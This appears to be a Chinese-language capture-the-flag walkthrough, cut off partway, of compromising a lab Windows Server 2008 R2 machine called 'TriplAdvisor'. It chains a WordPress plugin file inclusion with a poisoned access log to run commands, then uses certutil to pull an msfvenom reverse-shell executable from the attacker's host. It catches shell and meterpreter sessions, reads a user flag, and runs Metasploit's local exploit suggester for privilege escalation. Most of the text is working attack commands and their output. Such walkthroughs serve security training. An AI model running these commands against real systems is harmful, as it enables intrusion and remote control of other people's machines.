\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=dir"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" " Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of C:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes\n\n06\/30\/2024 10:00 AM <DIR> .\n06\/30\/2024 10:00 AM <DIR> ..\n06\/30\/2024 10:00 AM 9,400 ajax_shortcode_pattern.php\n06\/30\/2024 10:00 AM 26,382 pagebuilder-options-manager.class.php\n06\/30\/2024 10:00 AM 68,418 pagebuilder.class.php\n06\/30\/2024 10:00 AM 5,561 pagebuildermodules.class.php\n06\/30\/2024 10:00 AM 34,306 pb-shortcodes.class.php\n06\/30\/2024 10:00 AM 16,293 pb-skin-loader.class.php\n 6 File(s) 160,360 bytes\n 2 Dir(s) 23,849,553,920 bytes free\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u6210\u529frce\uff01<\/p>\n
RCE\u83b7\u53d6shell<\/h3>\n
\u5148\u751f\u6210\u4e00\u4e2a\u53cd\u5f39shell\u811a\u672c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom --payload windows\/x64\/shell_reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o revshell.exe \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes\nSaved as: revshell.exe<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
# \u4e5f\u53ef\u4ee5\u4f7f\u7528 python3 -m http.server 8888\uff0c\u4f46\u662f\u5dee\u751f\u6587\u5177\u591a\u3002\u3002\u3002\u3002\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit<\/code><\/pre>\n\u4e0a\u4f20\u672c\u5730\u7684\u811a\u672c\uff0c\u76d1\u542c\u7136\u540e\u6fc0\u6d3b\u5373\u53ef\uff1a<\/p>\n
# \u8bbe\u7f6e\u76d1\u542c\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 -m windows 2>\/dev\/null \n[02:34:30] Welcome to pwncat \ud83d\udc08!<\/code><\/pre>\n\u5c1d\u8bd5\u4e0b\u8f7d\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl "http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=certutil+-urlcache+-split+-f+http:\/\/192.168.10.101:8888\/revshell.exe+C:\\Windows\\Temp\\revshell.exe"\n192.168.56.1 - - [14\/Aug\/2024:10:42:52 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/error.log HTTP\/1.1" 200 5728866 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:43:07 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 272 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:44:38 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 504 "-" "curl\/8.8.0"\n192.168.56.1 - - [14\/Aug\/2024:10:52:26 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 736 "-" "curl\/8.8.0"\n192.168.56.1 - - [15\/Aug\/2024:21:00:56 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\/xampp\/apache\/logs\/access.log HTTP\/1.1" 200 968 "-" "curl\/8.8.0"\n192.168.56.1 - - [25\/Nov\/2024:22:26:47 -0800] "GET \/ HTTP\/1.1" 302 - "-" "curl\/8.10.1"\n192.168.10.101 - - [04\/Jun\/2025:15:07:45 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log HTTP\/1.1" 200 1288 "-" "Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0"\n192.168.10.101 - - [04\/Jun\/2025:15:08:02 -0700] "GET \/wordpress\/ HTTP\/1.1" 200 22542 "-" "**** Online ****\n 0000 ...\n 1c00\nCertUtil: -URLCache command completed successfully.\n"\nfe80::5479:dd94:1d27:478c - - [04\/Jun\/2025:15:08:07 -0700] "POST \/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000 HTTP\/1.1" 200 - "http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php?doing_wp_cron=1749074886.8125000000000000000000" "WordPress\/5.1.19; http:\/\/tripladvisor:8080\/wordpress"\n192.168.10.101 - - [04\/Jun\/2025:15:08:35 -0700] "GET \/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\\\xampp\\\\apache\\\\logs\\\\access.log&cmd=dir HTTP\/1.1" 200 2754 "-" "curl\/8.5.0"\n{"success":true,"data":{"output":[]}} <\/code><\/pre>\n\u53d1\u73b0\u5df2\u7ecf\u4e0b\u8f7d\u5230\u4e86\uff01<\/p>\n
![\"image-20250604144106404\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u7136\u540e\u6fc0\u6d3b\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=C:\\xampp\\apache\\logs\\access.log&cmd=C:\\Windows\\Temp\\revshell.exe<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6210\u529f\u5f39\u51fa\u6765\uff0c\u4e0d\u4f7f\u7528pwncat\u6362\u5176\u4ed6\u7684\u8bd5\u8bd5\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6210\u529f\u5f39\u51fa\u6765\u4e86\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u9996\u5148\u5728\u684c\u9762\u627e\u5230\u4e86\u4e00\u4e2aflag\u3002\u3002<\/p>\n
c:\\Users\\websvc\\Desktop>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is BCB3-AE45\n\n Directory of c:\\Users\\websvc\\Desktop\n\n08\/15\/2024 09:02 PM <DIR> .\n08\/15\/2024 09:02 PM <DIR> ..\n06\/30\/2024 10:10 AM 33 user.txt\n 1 File(s) 33 bytes\n 2 Dir(s) 23,848,247,296 bytes free\n\nc:\\Users\\websvc\\Desktop>type user.txt\ntype user.txt\n4159a2b3a38697518722695cbb09ee46<\/code><\/pre>\n\u7136\u540e\u641c\u96c6\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n
c:\\Users\\websvc\\Desktop>whoami \/all\nwhoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n=================== ==============================================\ntripladvisor\\websvc S-1-5-21-2621822639-2474692399-1676906194-1003\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n==================================== ================ ============ ==================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group\nMandatory Label\\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n============================= ========================================= ========\nSeChangeNotifyPrivilege Bypass traverse checking Enabled \nSeImpersonatePrivilege Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege Create global objects Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\n\nc:\\Users\\websvc\\Desktop>ipconfig \/all\nipconfig \/all\n\nWindows IP Configuration\n\n Host Name . . . . . . . . . . . . : TriplAdvisor\n Primary Dns Suffix . . . . . . . : \n Node Type . . . . . . . . . . . . : Hybrid\n IP Routing Enabled. . . . . . . . : No\n WINS Proxy Enabled. . . . . . . . : No\n\nEthernet adapter Local Area Connection:\n\n Connection-specific DNS Suffix . : \n Description . . . . . . . . . . . : Intel(R) PRO\/1000 MT Desktop Adapter\n Physical Address. . . . . . . . . : 08-00-27-D3-33-DD\n DHCP Enabled. . . . . . . . . . . : Yes\n Autoconfiguration Enabled . . . . : Yes\n IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900::1002(Preferred) \n Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:07:19 PM\n Lease Expires . . . . . . . . . . : Thursday, June 05, 2025 3:07:19 PM\n IPv6 Address. . . . . . . . . . . : fd00:4c10:d50a:f900:5479:dd94:1d27:478c(Deprecated) \n Link-local IPv6 Address . . . . . : fe80::5479:dd94:1d27:478c%3(Preferred) \n IPv4 Address. . . . . . . . . . . : 192.168.10.103(Preferred) \n Subnet Mask . . . . . . . . . . . : 255.255.255.0\n Lease Obtained. . . . . . . . . . : Wednesday, June 04, 2025 3:06:56 PM\n Lease Expires . . . . . . . . . . : Wednesday, June 04, 2025 5:06:56 PM\n Default Gateway . . . . . . . . . : fe80::4e10:d5ff:fe0a:f900%3\n 192.168.10.1\n DHCP Server . . . . . . . . . . . : 192.168.10.1\n DHCPv6 IAID . . . . . . . . . . . : 50855975\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2D-F5-24-BC-08-00-27-B4-04-E4\n DNS Servers . . . . . . . . . . . : fd00:4c10:d50a:f900:4e10:d5ff:fe0a:f900\n 192.168.1.1\n 192.168.10.1\n NetBIOS over Tcpip. . . . . . . . : Enabled\n\nc:\\Users\\websvc\\Desktop>systeminfo\nsysteminfo\n\nHost Name: TRIPLADVISOR\nOS Name: Microsoft Windows Server 2008 R2 Enterprise \nOS Version: 6.1.7600 N\/A Build 7600\nOS Manufacturer: Microsoft Corporation\nOS Configuration: Standalone Server\nOS Build Type: Multiprocessor Free\nRegistered Owner: Windows User\nRegistered Organization: \nProduct ID: 00486-109-0000007-84212\nOriginal Install Date: 6\/7\/2024, 1:24:47 PM\nSystem Boot Time: 6\/4\/2025, 3:06:38 PM\nSystem Manufacturer: innotek GmbH\nSystem Model: VirtualBox\nSystem Type: x64-based PC\nProcessor(s): 1 Processor(s) Installed.\n [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2578 Mhz\nBIOS Version: innotek GmbH VirtualBox, 12\/1\/2006\nWindows Directory: C:\\Windows\nSystem Directory: C:\\Windows\\system32\nBoot Device: \\Device\\HarddiskVolume1\nSystem Locale: en-us;English (United States)\nInput Locale: fr;French (France)\nTime Zone: (UTC-08:00) Pacific Time (US & Canada)\nTotal Physical Memory: 4,353 MB\nAvailable Physical Memory: 3,482 MB\nVirtual Memory: Max Size: 8,703 MB\nVirtual Memory: Available: 7,796 MB\nVirtual Memory: In Use: 907 MB\nPage File Location(s): C:\\pagefile.sys\nDomain: WORKGROUP\nLogon Server: N\/A\nHotfix(s): N\/A\nNetwork Card(s): 1 NIC(s) Installed.\n [01]: Intel(R) PRO\/1000 MT Desktop Adapter\n Connection Name: Local Area Connection\n DHCP Enabled: Yes\n DHCP Server: 192.168.10.1\n IP address(es)\n [01]: 192.168.10.103\n [02]: fe80::5479:dd94:1d27:478c\n [03]: fd00:4c10:d50a:f900:5479:dd94:1d27:478c\n [04]: fd00:4c10:d50a:f900::1002<\/code><\/pre>\n\u4e0d\u884c\u4e86\uff0cwindows\u4e0d\u592a\u4f1a\uff0c\u770b\u7684\u4e00\u5934\u96fe\u6c34\uff0c\u4e0amsf\u770b\u770b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 > use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set payload windows\/x64\/shell_reverse_tcp\npayload => windows\/x64\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set LHOST 192.168.10.101 \nLHOST => 192.168.10.101\nmsf6 exploit(multi\/handler) > set LPORT 1234\nLPORT => 1234\nmsf6 exploit(multi\/handler) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Command shell session 1 opened (192.168.10.101:1234 -> 192.168.10.103:49181) at 2025-06-04 03:11:07 -0400\n\nShell Banner:\nMicrosoft Windows [Version 6.1.7600]\n-----\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes><\/code><\/pre>\n\u4f7f\u7528\u76f8\u5173\u7684\u68c0\u67e5\u811a\u672c\uff0cctrl+Z\uff0c\u9009\u62e9 y\uff0c\u5219\u5c06\u5f53\u524dshell\u653e\u5230\u540e\u53f0\u3002<\/p>\n
c:\\Windows\\Temp>^Z\nBackground session 1? [y\/N] y\nmsf6 exploit(multi\/handler) > search local_exploit_suggest\n\nMatching Modules\n================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 post\/multi\/recon\/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester\n\nInteract with a module by name or index. For example info 0, use 0 or use post\/multi\/recon\/local_exploit_suggester\n\nmsf6 exploit(multi\/handler) > use 0\nmsf6 post(multi\/recon\/local_exploit_suggester) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 shell x64\/windows Shell Banner: Microsoft Windows [Version 6.1.7600] ----- 192.168.10.101:1234 -> 192.168.10.103:49181 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) > set session 1\nsession => 1\nmsf6 post(multi\/recon\/local_exploit_suggester) > run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[*] Running check method for exploit 1 \/ 1\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit\/windows\/local\/win_error_cve_2023_36874 No The target is not exploitable.\n\n[*] Post module execution completed<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u6f0f\u6d1e\u3002\u3002\u3002\u3002\u81ea\u6b64\u5c31\u9677\u5165\u957f\u65f6\u95f4\u7684\u50f5\u6301\u72b6\u6001\u4e86\uff0c\u7136\u540e\u770b\u5e08\u5085\u4eec\u7684wp\uff0c\u662f\u56e0\u4e3a\u8fd9\u4e2ashell\u529f\u80fd\u592a\u4f4e\uff0c\u9700\u8981\u5207\u6362\u81f3meterpreter\u8fdb\u884c\u641c\u96c6\u3002\u3002\u3002\u3002<\/p>\n
\u597d\uff0c\u91cd\u6765\u3002\u3002\u3002\u3002<\/p>\n
# kali1\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.10.101 LPORT=1234 -f exe -o pentest.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 510 bytes\nFinal size of exe file: 7168 bytes\nSaved as: pentest.exe\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/TriplAdvisor...\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/10.0.2.4:8888\nPress CTRL+C to quit\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] "GET \/pentest.exe HTTP\/1.1" 200 -\n192.168.10.103 - - [04\/Jun\/2025 03:52:21] "GET \/pentest.exe HTTP\/1.1" 200 -<\/code><\/pre>\n# kali2\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ msfconsole -q\nmsf6 > use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) > set payload windows\/x64\/meterpreter\/reverse_tcp\npayload => windows\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/handler) > options\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/handler) > set LPORT 1234\nLPORT => 1234\nmsf6 exploit(multi\/handler) > set LHOST 192.168.10.101\nLHOST => 192.168.10.101\nmsf6 exploit(multi\/handler) > run\n\n[*] Started reverse TCP handler on 192.168.10.101:1234 \n[*] Sending stage (201798 bytes) to 192.168.10.103\n[*] Meterpreter session 1 opened (192.168.10.101:1234 -> 192.168.10.103:49185) at 2025-06-04 03:52:57 -0400\n\nmeterpreter > ipconfig\n\nInterface 1\n============\nName : Software Loopback Interface 1\nHardware MAC : 00:00:00:00:00:00\nMTU : 4294967295\nIPv4 Address : 127.0.0.1\nIPv4 Netmask : 255.0.0.0\nIPv6 Address : ::1\nIPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\n\nInterface 3\n============\nName : Intel(R) PRO\/1000 MT Desktop Adapter\nHardware MAC : 08:00:27:d3:33:dd\nMTU : 1500\nIPv4 Address : 192.168.10.103\nIPv4 Netmask : 255.255.255.0\nIPv6 Address : fd00:4c10:d50a:f900::1002\nIPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\nIPv6 Address : fd00:4c10:d50a:f900:5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\nIPv6 Address : fe80::5479:dd94:1d27:478c\nIPv6 Netmask : ffff:ffff:ffff:ffff::\n\nmeterpreter > getuid\nServer username: TRIPLADVISOR\\websvc\nmeterpreter > sysinfo\nComputer : TRIPLADVISOR\nOS : Windows Server 2008 R2 (6.1 Build 7600).\nArchitecture : x64\nSystem Language : en_US\nDomain : WORKGROUP\nLogged On Users : 1\nMeterpreter : x64\/windows\nmeterpreter > sessions -l\nUsage: sessions [options] or sessions [id]\n\nInteract with a different session ID.\n\nOPTIONS:\n\n -h, --help Show this message\n -i, --interact <id> Interact with a provided session ID\n\nmeterpreter > shell\nProcess 2348 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\xampp\\htdocs\\wordpress\\wp-content\\plugins\\editor\\editor\\extensions\\pagebuilder\\includes>^Z\nBackground channel 1? [y\/N] y\n\nmeterpreter > background\n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) > use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) > sessions -l\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64\/windows TRIPLADVISOR\\websvc @ TRIPLADVISOR 192.168.10.101:1234 -> 192.168.10.103:49185 (192.168.10.103)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) > set session 1\nsession => 1\nmsf6 post(multi\/recon\/local_exploit_suggester) > run\n\n[*] 192.168.10.103 - Collecting local exploits for x64\/windows...\n[*] 192.168.10.103 - 196 exploit checks are being tried...\n[+] 192.168.10.103 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2019_1458_wizardopium: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/cve_2021_40449: The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.103 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\n[+] 192.168.10.103 - exploit\/windows\/local\/ms16_075_reflection_juicy: The target appears to be vulnerable.\n[*] Running check method for exploit 45 \/ 45\n[*] 192.168.10.103 - Valid modules for session 1:\n============================\n\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit\/windows\/local\/bypassuac_eventvwr Yes The target appears to be vulnerable.\n 2 exploit\/windows\/local\/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.\n 3 exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 4 exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.\n 5 exploit\/windows\/local\/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n 6 exploit\/windows\/local\/ms14_058_track_popup_menu Yes The target appears to be vulnerable.\n 7 exploit\/windows\/local\/ms15_051_client_copy_image Yes The target appears to be vulnerable.\n 8 exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.\n 9 exploit\/windows\/local\/ms16_075_reflection Yes The target appears to be vulnerable.\n 10 exploit\/windows\/local\/ms16_075_reflection_juicy Yes The target appears to be vulnerable.\n 11 exploit\/windows\/local\/agnitum_outpost_acs No The target is not exploitable.\n 12 exploit\/windows\/local\/always_install_elevated No The target is not exploitable.\n 13 exploit\/windows\/local\/bits_ntlm_token_impersonation No The target is not exploitable.\n 14 exploit\/windows\/local\/bypassuac_dotnet_profiler No The target is not exploitable.\n 15 exploit\/windows\/local\/bypassuac_fodhelper No The target is not exploitable.\n 16 exploit\/windows\/local\/bypassuac_sdclt No The target is not exploitable.\n 17 exploit\/windows\/local\/bypassuac_sluihijack No The target is not exploitable.\n 18 exploit\/windows\/local\/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found\n 19 exploit\/windows\/local\/capcom_sys_exec No Cannot reliably check exploitability.\n 20 exploit\/windows\/local\/cve_2020_0796_smbghost No The target is not exploitable.\n 21 exploit\/windows\/local\/cve_2020_1048_printerdemon No The target is not exploitable.\n 22 exploit\/windows\/local\/cve_2020_1313_system_orchestrator No The target is not exploitable.\n 23 exploit\/windows\/local\/cve_2020_1337_printerdemon No The target is not exploitable.\n 24 exploit\/windows\/local\/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!\n 25 exploit\/windows\/local\/cve_2021_21551_dbutil_memmove No The target is not exploitable.\n 26 exploit\/windows\/local\/cve_2022_21882_win32k No The target is not exploitable.\n 27 exploit\/windows\/local\/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot. 28 exploit\/windows\/local\/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.\n 29 exploit\/windows\/local\/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2\n 30 exploit\/windows\/local\/cve_2023_28252_clfs_driver No The target is not exploitable. The target system does not have clfs.sys in system32\\drivers\\\n 31 exploit\/windows\/local\/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found\n 32 exploit\/windows\/local\/ikeext_service No The check raised an exception.\n 33 exploit\/windows\/local\/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store\n 34 exploit\/windows\/local\/ms10_092_schelevator No The target is not exploitable. Windows Server 2008 R2 (6.1 Build 7600). is not vulnerable\n 35 exploit\/windows\/local\/ms15_078_atmfd_bof No Cannot reliably check exploitability.\n 36 exploit\/windows\/local\/ms16_014_wmi_recv_notif No The target is not exploitable.\n 37 exploit\/windows\/local\/ntapphelpcachecontrol No The check raised an exception.\n 38 exploit\/windows\/local\/nvidia_nvsvc No The check raised an exception.\n 39 exploit\/windows\/local\/panda_psevents No The target is not exploitable.\n 40 exploit\/windows\/local\/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found\n 41 exploit\/windows\/local\/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.\n 42 exploit\/windows\/local\/tokenmagic No The target is not exploitable.\n 43 exploit\/windows\/local\/virtual_box_opengl_escape No The target is not exploitable.\n 44 exploit\/windows\/local\/webexec No The check raised an exception.\n 